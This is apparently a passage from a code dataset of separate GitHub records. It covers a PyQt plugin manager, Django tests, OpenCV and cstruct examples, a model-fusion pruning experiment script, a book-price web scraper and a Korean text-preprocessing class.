msg.setIcon(QtWidgets.QMessageBox.Icon.Information)\n msg.setStyleSheet(\"font-family: Segoe UI; font-size:14px;\")\n msg.setWindowTitle(\"Information\")\n # setting message for Message Box\n msg.setText(\"Information !! \\n\\n\" + message)\n msg.setStandardButtons(QtWidgets.QMessageBox.StandardButton.Ok)\n msg.show()\n\n def close_msg():\n msg.done(0)\n\n QtCore.QTimer.singleShot(6000, close_msg)\n","repo_name":"Herusyahputra/PycharmProjects","sub_path":"moilapp-develop_anto/src/controllers/control_plugin_manager.py","file_name":"control_plugin_manager.py","file_ext":"py","file_size_in_byte":7154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
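The PluginCollection class imported at the top of the record above is defined elsewhere in that repository; only its interface (name_application, get_icon_, reload_plugins, get_widget) is visible here. As a rough, hypothetical sketch of how such a collection can enumerate plugin modules dropped into a folder, the standard pkgutil and importlib modules suffice; the folder name "plugins" simply mirrors the constructor argument used above and is an assumption, not the project's real mechanism.

import importlib.util
import pkgutil

def discover_plugins(package_dir="plugins"):
    """Yield (name, module) for each module found in package_dir.

    Illustrative stand-in for the PluginCollection used above,
    not the project's actual implementation.
    """
    for finder, name, _is_pkg in pkgutil.iter_modules([package_dir]):
        spec = finder.find_spec(name)
        module = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(module)
        yield name, module

if __name__ == "__main__":
    # Prints whatever modules currently sit in ./plugins (nothing if the
    # directory is absent, since iter_modules then yields no entries).
    for name, _module in discover_plugins():
        print("found plugin:", name)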
+{"seq_id":"32523824634","text":"from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom mixer.backend.django import mixer\nimport json\nfrom accomplishment.forms import AccomplishmentFormMixin\nfrom accomplishment.models import Accomplishment, UserAccomplishment\nfrom django.urls import reverse_lazy\nfrom subject_area.models import SubjectArea, Category\nfrom rest_framework.authtoken.models import Token\n\n\nclass AccomplishmentTestCase(TestCase):\n def setUp(self):\n self.session_user = mixer.blend(User)\n self.client.force_login(self.session_user)\n self.token = Token.objects.create(user=self.session_user).key\n self.client.defaults['HTTP_AUTHORIZATION'] = 'Token ' + self.token\n profile = self.session_user.profile\n profile.device_token = \"somedevicetoken\"\n profile.save()\n\n def test_accomplishment_creation(self):\n accomplishments_count = Accomplishment.objects.count()\n subject_areas = [instance for instance in mixer.cycle(2).blend(SubjectArea)]\n categories = [instance for instance in mixer.cycle(2).blend(Category)]\n\n category_ids = [category.id for category in categories]\n\n subject_areas[0].category_set.add(categories[0])\n subject_areas[1].category_set.add(categories[1])\n\n users = mixer.cycle(2).blend(User)\n\n i = 0\n\n for user in users:\n print(f\"whaaat: {subject_areas[i].id}\")\n user.profile.subject_area = subject_areas[i]\n user.save()\n user.profile.save()\n i += 1\n\n print(f\"hey 2: {user.profile.subject_area}\")\n\n with mixer.ctx(commit=False):\n data = mixer.blend(Accomplishment, name=\"test\", full_score=100).__dict__\n data = {**data, \"categories\": category_ids}\n\n response = self.client.post(reverse_lazy(\"accomplishment:list\"), data)\n print(response.content)\n\n accomplishment = Accomplishment.objects.first()\n\n print(f\"yeso: {SubjectArea.objects.all()}\")\n print(f\"yeso 2: {Category.objects.all()}\")\n print(f\"yeso 3: {User.objects.all()}\")\n print(f\"yeso 4: {UserAccomplishment.objects.all()}\")\n\n self.assertEqual(response.status_code, 302)\n self.assertEqual(Accomplishment.objects.count(), accomplishments_count+1)\n self.assertEqual(len(users), accomplishment.users.all().count())\n # self.assertEqual(len(subject_areas), accomplishment.subject_areas.all().count())\n\n users_after_accomplishment_creation = mixer.cycle(2).blend(User)\n\n subject_area_after_accomplishment_creation = mixer.blend(SubjectArea)\n\n category_after_accomplishment_creation = mixer.blend(\n Category, subject_area=subject_area_after_accomplishment_creation)\n\n accomplishment.categories.add(category_after_accomplishment_creation)\n\n i = 0\n for user in users_after_accomplishment_creation:\n user.profile.subject_area = subject_area_after_accomplishment_creation\n user.save()\n i += 1\n\n accomplishment.refresh_from_db()\n\n self.assertEqual(len(users)+len(users_after_accomplishment_creation), accomplishment.users.all().count())\n\n def test_accomplishment_edition(self):\n full_score = 3\n instance = self.create_accomplishment(full_score=full_score)\n subject_areas = instance.subject_areas.all()\n categories = instance.categories.all()\n accomplishment_users = set(instance.users.values_list(\"pk\", flat=True))\n\n with mixer.ctx(commit=False):\n new_data = mixer.blend(Accomplishment).__dict__\n new_data = {**new_data, \"categories\": [category.pk for category in categories]}\n\n response = self.client.post(reverse_lazy(\"accomplishment:edit\", kwargs={\"pk\": instance.pk}), data=new_data)\n self.assertEqual(response.status_code, 302)\n\n 
instance.refresh_from_db()\n\n        self.assertEqual(instance.name, new_data.get(\"name\"))\n        self.assertEqual(instance.categories.all().count(), categories.count())\n        self.assertEqual(set(instance.users.values_list(\"pk\", flat=True)), accomplishment_users)\n\n        # test changing of subject_areas\n\n        new_subject_areas = [subject_area for subject_area in mixer.cycle(3).blend(SubjectArea)]\n\n        i = 0\n\n        new_categories = [category for category in mixer.cycle(3).blend(Category)]\n\n        for new_subject_area in new_subject_areas:\n            new_categories[i].subject_area = new_subject_area\n            new_categories[i].save()\n            i += 1\n\n        new_data[\"categories\"] = [new_category.pk for new_category in new_categories]\n\n        new_users = mixer.cycle(3).blend(User)\n\n        i = 0\n        for user in new_users:\n            user.profile.subject_area = new_subject_areas[i]\n            user.save()\n            user.profile.save()\n            i += 1\n\n        response = self.client.post(reverse_lazy(\"accomplishment:edit\", kwargs={\"pk\": instance.pk}), data=new_data)\n        self.assertEqual(response.status_code, 302)\n        print(f\"users before the subject-area change: {accomplishment_users}\")\n        old_user = next(iter(accomplishment_users))\n        response = self.client.get(reverse_lazy(\"api_accomplishment:accomplishment-detail\",\n                                                kwargs={\"accomplishment_id\": instance.pk,\n                                                        \"user_id\": old_user}))\n\n        # the user must no longer appear here, since they no longer belong to the subject area\n\n        self.assertEqual(response.status_code, 404, f\"{json.loads(response.content)}\")\n\n        instance.refresh_from_db()\n\n        self.assertEqual(len(new_subject_areas), SubjectArea.objects.filter(\n            category__in=instance.categories.all()).count())\n        self.assertNotEqual(set(instance.users.values_list(\"pk\", flat=True)), accomplishment_users)\n\n        # example user must be user from subject_area because non-subject-areas aren't listed on endpoint\n\n        example_user = instance.categories.first().subject_area.profiles.first().user\n\n        for i in range(0, full_score):\n            response = self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-incrementation\",\n                                                    kwargs={\"user_id\": example_user.id, \"accomplishment_id\": instance.id})\n                                       )\n            self.assertEqual(response.status_code, 200)\n\n        self.assertEqual(response.status_code, 200)\n        self.assertEqual(json.loads(response.content).get(\"score\"), full_score)\n        instance.refresh_from_db()\n\n        new_full_score = 1\n        new_data[\"full_score\"] = new_full_score\n\n        response = self.client.post(reverse_lazy(\"accomplishment:edit\", kwargs={\"pk\": instance.pk}), data=new_data)\n\n        self.assertEqual(response.status_code, 302)\n\n        instance.refresh_from_db()\n\n        self.assertEqual(instance.full_score, new_full_score)\n\n    def test_incrementation_and_decrementation_of_users_accomplishment_score(self):\n        full_score = 3\n        accomplishment = self.create_accomplishment(full_score=full_score)\n        user = accomplishment.users.first()\n\n        response, json_response = self.fetch_user_accomplishment(user.id, accomplishment.id)\n\n        self.assertEqual(response.status_code, 200)\n        self.assertEqual(json_response.get(\"score\"), 0)\n\n        for i in range(0, full_score):\n            self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-incrementation\",\n                                         kwargs={\"user_id\": user.id, \"accomplishment_id\": accomplishment.id})\n                            )\n        response, json_response = self.fetch_user_accomplishment(user.id, accomplishment.id)\n        self.assertEqual(response.status_code, 200)\n        self.assertEqual(json_response.get(\"score\"), full_score)\n\n        response = self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-incrementation\",\n                                                kwargs={\"user_id\": user.id, 
\"accomplishment_id\": accomplishment.id})\n )\n\n self.assertEqual(response.status_code, 400)\n\n for i in range(0, full_score):\n self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-decrementation\",\n kwargs={\"user_id\": user.id, \"accomplishment_id\": accomplishment.id})\n )\n\n response, json_response = self.fetch_user_accomplishment(user.id, accomplishment.id)\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(json_response.get(\"score\"), 0)\n\n response = self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-decrementation\",\n kwargs={\"user_id\": user.id, \"accomplishment_id\": accomplishment.id})\n )\n\n self.assertEqual(response.status_code, 400)\n\n def create_accomplishment(self, full_score=1):\n subject_areas = [instance for instance in mixer.cycle(2).blend(SubjectArea)]\n categories = [instance for instance in mixer.cycle(2).blend(Category)]\n\n category_ids = [instance.pk for instance in categories]\n\n categories[0].subject_area = subject_areas[0]\n categories[1].subject_area = subject_areas[1]\n\n categories[0].save()\n categories[1].save()\n\n users = mixer.cycle(2).blend(User)\n\n i = 0\n for user in users:\n user.profile.subject_area = subject_areas[i]\n user.save()\n user.profile.save()\n i += 1\n\n with mixer.ctx(commit=False):\n data = mixer.blend(Accomplishment, full_score=full_score).__dict__\n data = {**data, \"categories\": category_ids}\n\n form = AccomplishmentFormMixin(data=data)\n instance = form.save()\n print(f\"....----....----.... {instance.users.all()}\")\n return instance\n\n def fetch_user_accomplishment(self, user_id, accomplishment_id):\n response = self.client.get(\n reverse_lazy(\"api_accomplishment:accomplishment-detail\",\n kwargs={\"user_id\": user_id, \"accomplishment_id\": accomplishment_id}))\n json_response = json.loads(response.content)\n return response, json_response\n\n def test_accomplishment_badges(self):\n self.assertEqual(self.session_user.profile.accomplishment_badges, 0)\n subject_area = mixer.blend(SubjectArea)\n categories = [instance for instance in mixer.cycle(2).blend(Category)]\n\n category_ids = [category.id for category in categories]\n\n subject_area.category_set.add(categories[0])\n subject_area.category_set.add(categories[1])\n\n profile = self.session_user.profile\n profile.subject_area = subject_area\n profile.save()\n\n with mixer.ctx(commit=False):\n data = mixer.blend(Accomplishment, name=mixer.RANDOM, full_score=100).__dict__\n data = {**data, \"categories\": category_ids}\n\n response = self.client.post(reverse_lazy(\"accomplishment:list\"), data)\n self.assertEqual(response.status_code, 302)\n self.session_user.profile.refresh_from_db()\n self.assertEqual(self.session_user.profile.accomplishment_badges, 1)\n","repo_name":"memobijou/clinic-app","sub_path":"accomplishment/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":11201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"20748457251","text":"import cv2\nimport numpy as np\n\n\nimg_dir = 'C:\\\\D\\\\testImgs\\\\'\nimg = cv2.imread(img_dir + 'aa.jpg')\nkernel = np.array([[0.299, 0.587, 0.114], [- 0.1687, 0.3313, 0.5], [0.5, 0.4187, 0.0813]])\n# 就是矩阵相乘:yuv = kernel * img, 针对每一个像素的rgb\nyuv = cv2.transform(img, kernel)\n\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\ncv2.imshow('original', img)\ncv2.imshow('y', yuv[:, :, 0])\ncv2.imshow('gray', gray)\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n","repo_name":"kingtub/OpencvExercise","sub_path":"opencv-python-book/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"73797074284","text":"import pytest\nfrom dissect import cstruct\n\nfrom dissect.cstruct.types import PackedType\n\nfrom .utils import verify_compiled\n\n\ndef test_packedtype_float():\n cs = cstruct.cstruct()\n\n assert cs.float16.dumps(420.69) == b\"\\x93^\"\n assert cs.float.dumps(31337.6969) == b\"e\\xd3\\xf4F\"\n assert cs.float16.reads(b\"\\x69\\x69\") == 2770.0\n assert cs.float.reads(b\"M0MS\") == 881278648320.0\n\n\ndef test_packedtype_float_struct(compiled):\n cdef = \"\"\"\n struct test {\n float16 a;\n float b;\n };\n \"\"\"\n cs = cstruct.cstruct()\n cs.load(cdef, compiled=compiled)\n\n assert verify_compiled(cs.test, compiled)\n\n buf = b\"69\\xb1U$G\"\n obj = cs.test(buf)\n\n assert obj.a == 0.6513671875\n assert obj.b == 42069.69140625\n\n\ndef test_packedtype_float_struct_be(compiled):\n cdef = \"\"\"\n struct test {\n float16 a;\n float b;\n };\n \"\"\"\n cs = cstruct.cstruct()\n cs.load(cdef, compiled=compiled)\n cs.endian = \">\"\n\n assert verify_compiled(cs.test, compiled)\n\n buf = b\"69G$U\\xb1\"\n obj = cs.test(buf)\n print(obj)\n\n assert obj.a == 0.388916015625\n assert obj.b == 42069.69140625\n\n\ndef test_packedtype_range():\n cs = cstruct.cstruct()\n float16 = PackedType(cs, \"float16\", 2, \"e\")\n float16.dumps(-65519.999999999996)\n float16.dumps(65519.999999999996)\n with pytest.raises(OverflowError):\n float16.dumps(-65519.999999999997)\n with pytest.raises(OverflowError):\n float16.dumps(65519.999999999997)\n","repo_name":"fox-it/dissect.cstruct","sub_path":"tests/test_packedtype.py","file_name":"test_packedtype.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"19"}
+{"seq_id":"8451598305","text":"from collections import OrderedDict\nimport copy\nfrom intrafusion_test import wrapper_intra_fusion\nfrom fusion_utils_IF import MetaPruneType, PruneType\nfrom pruning_modified import prune_structured, prune_structured_intra\nfrom performance_tester import train_during_pruning, update_running_statistics\nfrom parameters import get_parameters\nfrom train import get_model\nimport torch\nfrom fusion import MSF, IntraFusion_Clustering, fusion, fusion_bn, fusion_old, fusion_sidak_multimodel, fusion_bn_alt, intrafusion_bn\nfrom sklearn.model_selection import train_test_split\nfrom torchvision.transforms import ToTensor\nfrom torch.utils.data import DataLoader\nimport torch.nn as nn\nfrom torch import optim\nfrom torch.autograd import Variable\nfrom torchvision import datasets\nimport torchvision.transforms as transforms\nfrom models import get_pretrained_models\nimport json\nimport re\n\n\ndef get_cifar_data_loader(shuffle=True):\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n train_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10(root='./data', train=True, transform=transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(32, 4),\n transforms.ToTensor(),\n normalize,\n ]), download=True),\n batch_size=128, shuffle=shuffle,\n num_workers=4, pin_memory=True)\n\n val_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10(root='./data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n normalize,\n ])),\n batch_size=128, shuffle=False,\n num_workers=4, pin_memory=True)\n \n return {\n \"train\" : train_loader,\n \"test\" : val_loader\n }\n\n\ndef evaluate_performance_simple(input_model, loaders, gpu_id, eval=True):\n '''\n Computes the accuracy of a given model (input_model) on a given dataset (loaders[\"test\"]).\n '''\n if gpu_id != -1:\n input_model = input_model.cuda(gpu_id)\n \n if eval:\n input_model.eval()\n\n accuracy_accumulated = 0\n total = 0\n with torch.no_grad():\n for images, labels in loaders['test']:\n if gpu_id != -1:\n images, labels = images.cuda(), labels.cuda()\n \n test_output = input_model(images)\n\n pred_y = torch.max(test_output, 1)[1].data.squeeze()\n accuracy = (pred_y == labels).sum().item() / float(labels.size(0))\n accuracy_accumulated += accuracy \n total += 1\n input_model.cpu()\n return accuracy_accumulated / total\n\n\ndef get_data_loader(shuffle=True):\n test_data = datasets.MNIST(\n root = 'data', \n train = False, \n transform = ToTensor()\n ) \n\n train_data = datasets.MNIST(\n root = 'data', \n train = True, \n transform = ToTensor()\n ) \n\n # 2. 
defining the data loader for train and test set using the downloaded MNIST data\n loaders = { \n 'test' : torch.utils.data.DataLoader(test_data, \n batch_size=100, \n shuffle=shuffle, \n num_workers=1),\n \"train\": torch.utils.data.DataLoader(train_data, \n batch_size=100, \n shuffle=shuffle, \n num_workers=1)\n }\n return loaders\n\n\ndef test(model, loaders, args):\n model.eval()\n\n accuracy_accumulated = 0\n total = 0\n with torch.no_grad():\n for images, labels in loaders['test']:\n if args.gpu_id != -1:\n images, labels = images.cuda(), labels.cuda()\n test_output,_ = model(images)\n pred_y = torch.max(test_output, 1)[1].data.squeeze()\n accuracy = (pred_y == labels).sum().item() / float(labels.size(0))\n accuracy_accumulated += accuracy \n total += 1\n return accuracy_accumulated / total\n\n\nif __name__ == '__main__':\n args = get_parameters()\n num_models = args.num_models\n dict = {}\n it = 9\n\n models = get_pretrained_models(args.model_name, \"resnet50_diff_weight_init_True_cifar10\", args.gpu_id, num_models, output_dim=10)\n\n loaders = None\n if \"vgg\" not in args.model_name and \"resnet\" not in args.model_name:\n print(\"Went in here!!!\")\n loaders = get_data_loader()\n else:\n print(\"Got cifar\")\n loaders = get_cifar_data_loader()\n\n \n \"\"\"accuracies = []\n\n result = {}\n sparsities = [0.1, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4, 0.45, 0.5, 0.55, 0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9]\n result[\"prune\"] = {}\n result[\"IF\"] = {}\n prune_type = \"l1\"\n for sparsity in sparsities:\n print(\"----------\")\n t = prune_structured(net=copy.deepcopy(models[0]), loaders=None, prune_iter_epochs=0, gpu_id=args.gpu_id, example_inputs=torch.randn(1, 3, 32, 32),\n out_features=10, prune_type=prune_type, sparsity=sparsity, train_fct=None, prune_iter_steps=1)\n result[\"prune\"][sparsity] = evaluate_performance_simple(t, loaders, 0, eval=True)\n print(result[\"prune\"][sparsity])\n\n fused_model_g = wrapper_intra_fusion(model=models[0], model_name = args.model_name, resnet=False, sparsity=sparsity, prune_iter_steps=0, num_epochs=0, loaders=None, prune_type=\"l1\", meta_prune_type=MetaPruneType.IF, gpu_id=0)\n #fused_model_g = intrafusion_bn(models[0], full_model = models[0], meta_prune_type = MetaPruneType.IF, prune_type=prune_type, model_name=args.model_name, sparsity=sparsity, fusion_type=\"weight\", gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n result[\"IF\"][sparsity] = evaluate_performance_simple(fused_model_g, loaders, 0, eval=True)\n print(result[\"IF\"][sparsity])\n print(\"--------------\")\n with open(f\"results_datafree_resnet18_{prune_type}.json\", \"w\") as outfile:\n json.dump(result, outfile, indent=4)\n exit()\"\"\"\n\n\n for idx, ((layer0_name, fc_layer0_weight), (layer1_name, fc_layer1_weight)) in \\\n enumerate(zip(models[0].named_parameters(), models[0].named_parameters())):\n print(f\"{layer0_name} : {fc_layer0_weight.shape}\")\n\n\n fused_model_g = fusion_bn(models, model_name = args.model_name, fusion_type=\"activation\", gpu_id=-1, resnet=True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n #fused_model_g = wrapper_intra_fusion(model=models[0], model_name=args.model_name, resnet=True, sparsity=0.1, prune_iter_steps=0, num_epochs=0, loaders=loaders, prune_type=PruneType.L2, meta_prune_type=MetaPruneType.IF, gpu_id=0)\n #fused_model_g = fusion(models, gpu_id=args.gpu_id, resnet=True)\n print(evaluate_performance_simple(fused_model_g, loaders, 0, eval=True))\n exit()\n \"\"\"fused_model_g = 
intrafusion_bn(models[0], full_model = models[0], sparsity=0.9, fusion_type=\"weight\", gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n print(evaluate_performance_simple(fused_model_g, loaders, 0, eval=True))\n exit()\"\"\"\n\n\n result = {}\n\n train_epochs = 10\n sparsities = [0.9]\n total_steps = 5\n for idx, model in enumerate(models):\n result[f\"model_{idx}\"] = {}\n for sparsity in sparsities:\n print(\"****************Sparsity: \", sparsity)\n \"\"\"prune_steps = prune_structured_intra(net=copy.deepcopy(model), loaders=None, num_epochs=0, gpu_id=args.gpu_id, example_inputs=torch.randn(1, 3, 32, 32),\n out_features=10, prune_type=\"l1\", sparsity=sparsity, train_fct=None, total_steps=total_steps)\n fused_model_g = model\n for prune_step in prune_steps:\n fused_model_g = intrafusion_bn(fused_model_g, sparsity=sparsity, fusion_type=\"weight\", full_model = model, small_model=prune_step, gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n fused_model_g,_ = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=train_epochs, gpu_id =0, prune=False, performed_epochs=0)\"\"\"\n fused_model_g = wrapper_intra_fusion(model=model, model_name=args.model_name, resnet=False, sparsity=sparsity, prune_iter_steps=total_steps, num_epochs=train_epochs, loaders=loaders, prune_type=PruneType.L2, meta_prune_type=MetaPruneType.IF, gpu_id=0)\n accuracy_fused_g = evaluate_performance_simple(fused_model_g, loaders, 0, eval=True)\n print(\"fused: \", accuracy_fused_g)\n fused_model_g, epoch_accuracies = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=100, gpu_id =0, prune=False, performed_epochs=0)\n print(\"Final fused is: \", epoch_accuracies[-1])\n result[f\"model_{idx}\"][sparsity] = epoch_accuracies\n \n with open(\"results_intrafusion_resnet18_dataaware_prune_L2_05.json\", \"w\") as outfile:\n json.dump(result, outfile, indent=4)\n\n\n exit()\n \"\"\"sparsities = [0.5, 0.6, 0.7, 0.8]\n result = {}\n for idx, model in enumerate(models):\n result[f\"model_{idx}\"] = {}\n for sparsity in sparsities:\n fused_model_g = model\n iterations = []\n if sparsity > 0.5:\n if sparsity == 0.6:\n iterations = [0.2, 0.4]\n if sparsity == 0.7 or sparsity == 0.8:\n iterations = [0.2, 0.4, 0.6]\n for i in iterations:\n fused_model_g = intrafusion_bn(fused_model_g, sparsity=i, fusion_type=\"weight\", full_model = model, gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n fused_model_g, _ = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=10, gpu_id =0, prune=False, performed_epochs=0)\n\n fused_model_g = intrafusion_bn(fused_model_g, sparsity=sparsity, fusion_type=\"weight\", full_model = model, gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n #fused_model_g, _ = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=140, gpu_id =0, prune=False, performed_epochs=0)\n accuracy_fused_g = evaluate_performance_simple(fused_model_g, loaders, 0, eval=True)\n print('Test Accuracy of the model fused beginning gradient: %.2f' % accuracy_fused_g)\n\n #print('Test Accuracy of the model fused beginning weight: %.2f' % accuracy_fused_w)\n\n fused_model_g, epoch_accuracies = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=150-10*len(iterations), gpu_id =0, prune=False, performed_epochs=0)\n\n print('Test Accuracy of the model fused beginning gradient: %.2f' % 
accuracy_fused_g)\n result[f\"model_{idx}\"][str(sparsity)] = epoch_accuracies\n\n with open(\"results_intrafusion.json\", \"w\") as outfile:\n json.dump(result, outfile, indent=4)\n exit()\"\"\"\n #fused_model_w, _ = train_during_pruning(fused_model_w, loaders=loaders, num_epochs=40, gpu_id =0, prune=False, performed_epochs=0)\n fused_model_g, _ = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=40, gpu_id =0, prune=False, performed_epochs=0)\n\n #accuracy_fused_w = evaluate_performance_simple(fused_model_w, loaders, 0, eval=True)\n accuracy_fused_g = evaluate_performance_simple(fused_model_g, loaders, 0, eval=True)\n\n #print('Test Accuracy of the model fused beginning weight: %.2f' % accuracy_fused_w)\n print('Test Accuracy of the model fused beginning gradient: %.2f' % accuracy_fused_g)\n \"\"\"fused_accs = []\n for idx in range(40):\n fused_model, _ = train_during_pruning(fused_model, loaders=loaders, num_epochs=1, gpu_id =0, prune=False, performed_epochs=0)\n fused_accs.append(evaluate_performance_simple(fused_model, loaders, 0, eval=True))\n\n\n accuracy_fused = evaluate_performance_simple(fused_model, loaders, 0, eval=True)\n print('Test Accuracy of the model fused after: %.2f' % accuracy_fused)\n print(fused_accs)\"\"\"\n\n\n\n\n \n\n\n\n\n\n\n \n\n\n","repo_name":"olinmg/DL_Project_LTH_Fusing","sub_path":"fusion_pruning_experiments/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
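The prune_structured / intrafusion_bn helpers that drive the sweeps above live in sibling modules of that repository and are not part of this record. As a rough, self-contained illustration of what a single L1 structured-pruning step does to a convolution, PyTorch's built-in pruning utilities are enough; the 0.5 below is an arbitrary stand-in for the script's sparsities list, not a value taken from the experiments.

import torch
import torch.nn as nn
import torch.nn.utils.prune as prune

conv = nn.Conv2d(16, 32, kernel_size=3)

# L1-norm structured pruning along dim=0 zeroes whole output channels,
# loosely analogous to the "l1" prune_type used in the experiments above.
prune.ln_structured(conv, name="weight", amount=0.5, n=1, dim=0)

zeroed = (conv.weight.abs().sum(dim=(1, 2, 3)) == 0).sum().item()
print(f"{zeroed}/{conv.out_channels} output channels zeroed")

prune.remove(conv, "weight")  # make the reparameterization permanent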
+{"seq_id":"44924297033","text":"'''\nSIMPLE WEBSCRAPPER TO SCRAPE THE PRICE OF ALL BOOKS ON SAID URL And writes them/saves to a cvs file to be viwed in a spreadsheet.\nSIMPLY CHANGE THE ELEMENTS AND VARIABLES TO REVERSE ENGINEER THIS TO WORK AS YOU SEE FIT.\n'''\nfrom flask import Flask, render_template, request, requests\nfrom bs4 import BeautifulSoup\nfrom csv import writer\n\n# Desired website:\nresponse = requests.get('http://books.toscrape.com/')\n\n# Declare Beautiful Soup Parser:\nsoup = BeautifulSoup(response.text, 'html.parser')\n\n#Declare Prices variavle:\nprices = soup.find_all(class_=\"product_price\") # find all classes with the name product_price\n\n# Save Data to CVS file:\nwith open('NameOfFile.csv', 'w') as csv_file:\n csv_writer = writer(csv_file)\n # headers = ['Title', 'Price']\n headers = [\"header1\", \"header2\"]\n csv_writer.writerow(headers)\n\n # loop through prices content and pinpick desired section/content, then save to CVS file\n for price in prices:\n myPrice = price.get_text().replace('\\n', '')[:7]\n csv_writer.writerow([myPrice]) # writes a row of each data into cvs file","repo_name":"EsC369/Python_Web_Scrapper","sub_path":"pythonWebScrapper.py","file_name":"pythonWebScrapper.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"73837738923","text":"from teanaps import configure as con\n#from teanaps.nlp import NamedEntityRecognizer\n#from konlpy.tag import Kkma\nfrom kss import split_sentences\n \nimport re\nimport time\n#from pykospacing import spacing\n\nclass Processing(): \n def __init__(self):\n self.stopword_path = con.STOPWORD_PATH\n self.stopword_org_path = con.STOPWORD_ORG_PATH\n self.cnoun_path = con.CNOUN_PATH\n self.cnoun_org_path = con.CNOUN_ORG_PATH\n self.synonym_path = con.SYNONYM_PATH\n self.synonym_org_path = con.SYNONYM_ORG_PATH\n #self.kkma = Kkma()\n \n def get_synonym(self): \n synonym_list = open(con.SYNONYM_PATH, encoding=\"utf-8\").read().strip().split(\"\\n\")\n synonym_dict = {}\n for synonym in synonym_list:\n for i, word in enumerate(synonym.split(\"\\t\")):\n if i == 0:\n representative_word = word\n synonym_dict[representative_word] = synonym.split(\"\\t\")\n return synonym_dict\n \n def add_synonym(self, add_dict={}):\n synonym_dict = self.get_synonym()\n for representative_word, synonym_list in add_dict.items():\n if representative_word in synonym_dict.keys():\n for synonym in synonym_list:\n if synonym not in synonym_dict[representative_word]:\n synonym_dict[representative_word].append(synonym)\n else:\n synonym_dict[representative_word] = []\n for synonym in synonym_list:\n if synonym not in synonym_dict[representative_word]:\n synonym_dict[representative_word].append(synonym)\n f = open(self.synonym_path, \"w\", encoding=\"utf-8\")\n for representative_word, synonym_list in synonym_dict.items():\n synonym_line = \"\"\n if representative_word not in synonym_list:\n f.write(representative_word + \"\\t\")\n for synonym in synonym_list:\n synonym_line += synonym + \"\\t\"\n f.write(synonym_line.strip() + \"\\n\")\n f.close()\n \n def remove_synonym(self, remove_list=[]):\n if type(remove_list) == type(\"\"):\n remove_list = [remove_list]\n synonym_dict = self.get_synonym()\n for synonym in remove_list:\n if synonym in synonym_dict.keys():\n del synonym_dict[synonym]\n else:\n for representative_word, synonym_list in synonym_dict.items():\n if synonym in synonym_list:\n synonym_list.remove(synonym)\n f = open(self.synonym_path, \"w\", encoding=\"utf-8\")\n for representative_word, synonym_list in synonym_dict.items():\n synonym_line = \"\"\n if representative_word not in synonym_list:\n f.write(representative_word + \"\\t\")\n for synonym in synonym_list:\n synonym_line += synonym + \"\\t\"\n f.write(synonym_line.strip() + \"\\n\")\n f.close()\n \n def clear_synonym(self):\n f = open(self.synonym_path, \"w\", encoding=\"utf-8\")\n f.close()\n \n def set_org_synonym(self):\n f = open(self.synonym_path, \"w\", encoding=\"utf-8\")\n f_org = open(self.synonym_org_path, encoding=\"utf-8\")\n for line in f_org:\n f.write(line)\n f_org.close()\n f.close()\n \n def is_synonym(self, synonym):\n synonym_dict = self.get_synonym()\n if synonym in synonym_dict.keys():\n return True\n for representative_word, synonym_list in synonym_dict.items():\n if representative_word == synonym or synonym in synonym_list:\n return True\n return False\n \n def get_cnoun(self):\n cnoun_list = []\n f = open(self.cnoun_path, encoding=\"utf-8\")\n for line in f:\n cnoun_list.append(line.strip())\n f.close()\n return cnoun_list\n \n def add_cnoun(self, add_list=[]):\n cnoun_list = self.get_cnoun()\n f = open(self.cnoun_path, \"a\", encoding=\"utf-8\")\n if type(add_list) == type(\"\"):\n add_list = [add_list]\n for cnoun in add_list:\n if cnoun not in cnoun_list:\n f.write(cnoun + \"\\n\")\n f.close()\n 
